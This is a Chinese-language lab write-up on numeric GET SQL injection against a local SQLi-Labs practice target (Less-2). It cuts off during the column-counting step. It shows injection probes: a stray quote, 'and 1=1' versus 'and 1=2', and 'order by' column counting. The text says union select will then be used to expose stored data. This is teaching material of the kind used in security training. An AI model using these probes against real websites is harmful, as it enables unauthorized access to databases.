实验原理
数字型GET注入,其注入点存在于URL中的参数处。
攻击者可以通过构造恶意的get输入参数,利用union select命令进行注入,暴露数据库中存储的信息。
实验一
步骤:
1.访问靶机网站:http://127.0.0.1:456/Less-2/
登录后,根据网页,给出GET参数
?id=1
显示出用户名:Dumb,密码:Dumb
注:该实验利用Firefox的插件:Hackbar。没有该插件可到搜索框里输入payload参数。
2.寻找注入点
http://127.0.0.1:456/Less-2/?id=1‘
运行后报错
http://127.0.0.1:456/Less-2/?id=1 and 1=1
运行显示正常
http://127.0.0.1:456/Less-2/?id=1 and 1=2
运行显示错误
由上述结果可以判断,网站存在数字型注入点
3.判断网站查询的字段数
利用关键字:order by 获取网站查询的字段数
http://127.0.0.1:456/Less-2/?id=1 order by 1–+
可以正常显示
http://127.0.